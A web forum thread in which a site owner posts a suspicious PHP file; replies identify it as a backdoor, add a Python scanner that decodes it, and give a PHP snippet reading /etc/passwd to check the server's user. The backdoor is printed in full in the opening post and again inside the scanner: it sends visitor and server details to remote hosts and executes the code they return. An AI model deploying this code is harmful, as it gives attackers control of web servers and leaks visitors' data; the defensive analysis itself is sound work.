I found this strange file. Does this look suspicious to anyone? (It does to me!) Thanks to anyone who can advise.
<? error_reporting(0);   // suppress any warning that would reveal the remote fetch
$s="e";                  // literal "e" marker placed between two fields of the beacon string below
// Collect request and server details, falling back to the old register_globals names
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Base64-encode every value and join them with "." into one string sent as the query
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
// Fetch and execute whatever the first reachable host returns. The base64 literals decode to
// "http://", "a.rsdcraft.ws", "ad.runweb.info" and "http://7.xmldata.info/?". The two include()
// calls need allow_url_include; the eval(file_get_contents()) fallback only needs allow_url_fopen.
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str));
?>
HELP I've been hacked!
Re: HELP I've been hacked!
Yep, a backdoor.
You should be more concerned about how it got there (although at least one of the related hosts appears to be online).
- Chris Corbyn
- Breakbeat Nuttzer
- Posts: 13098
- Joined: Wed Mar 24, 2004 7:57 am
- Location: Melbourne, Australia
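To see concretely what that one-liner reports home and where it pulls code from, here is an added Python triage script; it is my example, not code from the thread or from whoever wrote the backdoor. It embeds the sample from the opening post as a constructed test input, reassembles the concatenated base64_decode() literals into the target URLs, lists the request fields that get exfiltrated, flags the eval/include sinks, and scan_tree() applies the same checks to every .php file under a webroot so you can look for other copies. The directory and file names used by demo_scan() are made up; the matching is heuristic and only catches double-quoted base64_decode() literals, so treat a clean result as "nothing obvious", not "nothing there".

```python
#!/usr/bin/env python3
"""Triage helper for PHP files that load code from remote hosts (added example)."""
import base64
import binascii
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Constructed sample: the one-liner from the opening post, embedded verbatim so
# the decoder can be checked against it. Files on disk are scanned the same way.
SAMPLE = r'''<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>'''

B64_LITERAL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# One or more base64_decode() calls joined with PHP's "." operator; together
# they spell out one URL or hostname that was split to defeat simple greps.
B64_CHAIN = re.compile(
    r'base64_decode\(\s*"[A-Za-z0-9+/=]+"\s*\)'
    r'(?:\s*\.\s*base64_decode\(\s*"[A-Za-z0-9+/=]+"\s*\))*'
)
SERVER_VAR = re.compile(r'\$_SERVER\["([A-Z_]+)"\]')
SINKS = {
    "eval": re.compile(r'\beval\s*\('),
    "include/require": re.compile(r'\b(?:include|require)(?:_once)?\s*\('),
    "file_get_contents": re.compile(r'\bfile_get_contents\s*\('),
    "error_reporting(0)": re.compile(r'\berror_reporting\s*\(\s*0\s*\)'),
}


def decode_literal(b64: str) -> Optional[str]:
    """Decode one base64 literal; None if it is not valid base64 or not printable text."""
    try:
        text = base64.b64decode(b64, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def remote_targets(src: str) -> List[str]:
    """Reassemble every chain of concatenated base64_decode() literals, in order."""
    found: List[str] = []
    for chain in B64_CHAIN.finditer(src):
        parts = [decode_literal(p) for p in B64_LITERAL.findall(chain.group(0))]
        if all(parts):
            joined = "".join(parts)
            if joined not in found:
                found.append(joined)
    return found


def collected_fields(src: str) -> List[str]:
    """Request/server fields the script gathers before phoning home."""
    seen: List[str] = []
    for name in SERVER_VAR.findall(src):
        if name not in seen:
            seen.append(name)
    return seen


def sinks_present(src: str) -> List[str]:
    return [name for name, rx in SINKS.items() if rx.search(src)]


def is_remote_include_backdoor(src: str) -> bool:
    """True when the file both hides an http target and executes fetched code."""
    sinks = sinks_present(src)
    executes = "eval" in sinks or "include/require" in sinks
    return executes and any(t.startswith("http") for t in remote_targets(src))


def analyze(src: str) -> Dict[str, object]:
    return {
        "targets": remote_targets(src),
        "fields": collected_fields(src),
        "sinks": sinks_present(src),
        "backdoor": is_remote_include_backdoor(src),
    }


def scan_tree(root: Path) -> Dict[str, Dict[str, object]]:
    """Report every *.php file under root that matches the backdoor pattern."""
    hits: Dict[str, Dict[str, object]] = {}
    for path in sorted(root.rglob("*.php")):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue
        report = analyze(src)
        if report["backdoor"]:
            hits[str(path.relative_to(root))] = report
    return hits


def demo_scan() -> Dict[str, Dict[str, object]]:
    """Write the sample plus a clean file into a temp dir (made-up names) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content").mkdir()
        (root / "wp-content" / "cache.php").write_text(SAMPLE)
        (root / "index.php").write_text("<?php echo 'hello'; ?>")
        return scan_tree(root)


if __name__ == "__main__":
    import json
    import sys
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    print(json.dumps(scan_tree(target) if target else analyze(SAMPLE), indent=2))
```

Run it with no arguments to see the decoded report for the sample, or give it the path to a webroot to list every PHP file that shows the same decode-then-execute shape. The decoded hostnames are what you hand to the host or block at the firewall; the field list tells you what the attacker learns about each visitor (including REMOTE_ADDR and SCRIPT_FILENAME, so they know the path of the infected file on your server).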
Re: HELP I've been hacked!
Are you on a shared hosting plan? What host are you with?
Run this script and see if you get a generic username output:
Code: Select all
<?php
// Effective UID of the running PHP process, i.e. the account the web server runs as.
// getmyuid() only reports the owner of this script file, so prefer posix_getuid() when available.
$uid = function_exists('posix_getuid') ? posix_getuid() : getmyuid();
if (is_file('/etc/passwd')) {
    $lines = file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    foreach ($lines as $line) {
        // passwd format: name:password:uid:gid:gecos:home:shell; compare the uid field only
        $data = explode(':', $line);
        if (isset($data[2]) && (int) $data[2] === $uid) {
            printf("Server is using user '%s'", $data[0]);
            break;
        }
    }
} else {
    printf("Unable to determine username");
}
If the user is anything like "apache", "http", "nobody", "www" etc then it's highly probable all the other users on that server have free and easy access to your files.

That script isn't dangerous. It tries to look up the username of the UID apache is running under. If the server is a Windows server, or a *nix variant which doesn't use /etc/passwd then it won't work.